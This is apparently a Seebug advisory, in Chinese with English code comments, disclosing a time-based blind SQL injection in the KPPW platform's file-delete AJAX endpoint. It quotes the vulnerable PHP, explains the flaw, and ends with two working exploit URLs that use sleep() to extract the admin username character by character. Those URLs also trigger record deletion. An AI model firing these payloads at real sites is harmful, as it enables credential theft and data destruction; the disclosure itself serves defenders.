kppw威客系统SQL盲注漏洞

2014-04-25T00:00:00
ID SSV:94531
Type seebug
Reporter Root
Modified 2014-04-25T00:00:00

Description

简要描述:

kppw威客系统SQL盲注漏洞

详细说明:

文件:/control/ajax/ajax_file.php

// "delete" branch of the ajax dispatcher in /control/ajax/ajax_file.php; the enclosing
// switch is not part of this quote. $file_id and $filepath are forwarded to
// del_att_file() exactly as received — per the PoC URL they are request parameters —
// and no integer cast or escaping happens before the call.
case "delete":
    $res = keke_file_class::del_att_file($file_id, $filepath);
    // Only a success flag is returned to the client ('1' or '0'); together with the
    // query delay this is what the blind-injection PoC uses as its oracle.
    // NOTE(review): `$res and A or B` parses as `($res and A) or B`; if echojson()
    // returns a falsy value instead of exiting, both the '1' and the '0' response
    // would be emitted — confirm echojson()'s behaviour.
    $res and kekezu::echojson ( '', '1' ) or kekezu::echojson ( '', '0' );
    die ();
    break;

进入del_att_file函数:
/**
 * Deletes one attachment record and, if present, its file on disk.
 *
 * @param int|string $fid      attachment id. The only check is `$fid > 0`; under PHP's
 *                             loose comparison a string that starts with a digit (the PoC
 *                             sends "1 and if(...)...") passes it, and the value is then
 *                             concatenated into SQL unescaped.
 * @param string     $filepath optional save_name filter; also concatenated unescaped,
 *                             inside double quotes.
 * @param string     $del_more comma-separated prefixes of derived files to unlink as well.
 * @return mixed result of unlink() when a file was removed, otherwise the DB delete result.
 *
 * NOTE(review): as quoted here the snippet opens one more `{` than it closes — the final
 * brace of the function (or of the `if ($fid > 0)` block) was lost in the paste.
 */
static function del_att_file($fid = 0, $filepath = '', $del_more = '') {
    $file_obj = new Keke_witkey_file_class ();
    if ($fid > 0) {
        // SQL injection sink: $fid and $filepath become part of the WHERE clause as raw text.
        $where = 'file_id=' . $fid;
        $filepath != '' && $where .= ' and save_name="' . $filepath . '"';
        $file_obj->setWhere ( $where );
        $file_info = $file_obj->query_keke_witkey_file ();
        // The same unsanitised WHERE is reused for the DELETE, so an injected condition
        // also decides which rows get removed — the PoC is not read-only.
        $file_obj->setWhere ( $where );
        $res = $file_obj->del_keke_witkey_file ();
        // NOTE(review): when the query matched nothing, $file_info[0] is undefined here
        // and $filepath becomes null.
        $filepath = $file_info [0] ['save_name'];
        if (is_file ( $filepath )) {
            $unlink = unlink ( $filepath );
            if ($del_more != '') {
                $more_name = array (); // never used
                $dirname = dirname ( $filepath );
                $dirname = $dirname . '/';
                $basename = basename ( $filepath );
                $size_arr = explode ( ',', $del_more );
                for($i = 0; $i < sizeof ( $size_arr ); $i ++) {
                    unlink ( $dirname . $size_arr [$i] . '_' . $basename );
                }
            }
        }
        // NOTE(review): $unlink is only assigned inside the is_file() branch; on any other
        // path this reads an undefined variable and falls back to $res.
        return $unlink ? $unlink : $res;
    }
进入query_keke_witkey_file函数:

/**
 * Runs `select * from <table> [where <_where>]`, optionally through the cache layer.
 *
 * $this->_where is spliced into the statement verbatim: no escaping or parameter binding
 * takes place here, so every caller of setWhere() is responsible for sanitising its
 * input — del_att_file() does not.
 *
 * @param int $is_cache   when non-zero, turns caching on for this call.
 * @param int $cache_time when non-zero, overrides the cache TTL.
 * @return mixed query result (from cache or from $this->_dbop).
 */
function query_keke_witkey_file($is_cache=0, $cache_time=0){
    if($this->_where){
        // Injection point: the raw WHERE string is concatenated into the SQL.
        $sql = "select * from $this->_tablename where ".$this->_where;
    } else{
        $sql = "select * from $this->_tablename";
    }
    if ($is_cache) {
        $this->_cache_config ['is_cache'] = $is_cache;
    }
    if ($cache_time) {
        $this->_cache_config ['time'] = $cache_time;
    }
    if ($this->_cache_config ['is_cache']) {
        if (CACHE_TYPE) {
            $keke_cache = new keke_cache_class ( CACHE_TYPE );
            // Cache key is the table name plus 6 hex chars of md5(raw WHERE). If caching is
            // on, a repeated identical payload is served from cache and never reaches the
            // DB again (so no sleep() delay the second time); distinct payloads get
            // distinct keys.
            $id = $this->_tablename . ($this->_where?"_" .substr(md5 ( $this->_where ),0,6):'');
            $data = $keke_cache->get ( $id );
            if ($data) {
                // NOTE(review): on a cache hit _where is not reset, unlike the other paths.
                return $data;
            } else {
                $res = $this->_dbop->query ( $sql );
                $keke_cache->set ( $id, $res,$this->_cache_config['time'] );
                $this->_where = "";
                return $res;
            }
        }
        // NOTE(review): caching enabled but CACHE_TYPE falsy returns nothing and leaves
        // _where set.
    }else{
        $this->_where = "";
        return $this->_dbop->query ( $sql );
    }
}

在拼接SQL语句时: $where = 'file_id=' . $fid; $sql = "select * from $this->_tablename where ".$this->_where; file_id 未做整型转换或转义就直接拼入 where 条件；del_att_file 中唯一的检查 `$fid > 0` 对 PoC 中以数字开头的字符串同样成立，起不到过滤作用，导致 SQL 注入。filepath 也以 save_name="..." 的形式未经转义拼入同一条件（PoC 用 # 将这一段注释掉）。此外，同一个 $where 随后还被 del_keke_witkey_file 用作 DELETE 的条件，注入的条件同样会决定哪些记录被删除。

漏洞证明:

利用证明（URL 末尾的 %23 即 #，用于注释掉后面拼接的 and save_name="123" 条件；以 sleep(5) 是否触发作为时间盲注的判据）:

http://127.0.0.1/kppw/index.php?do=ajax&view=file&ajax=delete&file_id=1 and if(substr((select username from keke_witkey_member where uid=1),1,1)=0x61,sleep(5), 1)%23&filepath=123

返回正常，无明显延迟：if() 条件为假（首字符不是 0x61 即 'a'），if() 返回 1，where 退化为 file_id=1，查询正常命中。注意 del_keke_witkey_file 复用了同一个 $where，条件为假的请求很可能会真正删除 file_id=1 的记录及其磁盘文件（del_keke_witkey_file 的实现未在此给出，请按具有破坏性处理），因此响应中的 0/1 并不是可靠判据。

http://127.0.0.1/kppw/index.php?do=ajax&view=file&ajax=delete&file_id=1 and if(substr((select username from keke_witkey_member where uid=1),1,1)=0x62,sleep(5), 1)%23&filepath=123

返回错误，延迟 5 秒后返回：if() 条件为真（首字符为 0x62 即 'b'），sleep(5) 被执行并返回 0，where 不命中任何记录，$file_info 为空，接口返回 0。判定应以约 5 秒的延迟为准，而不是返回值。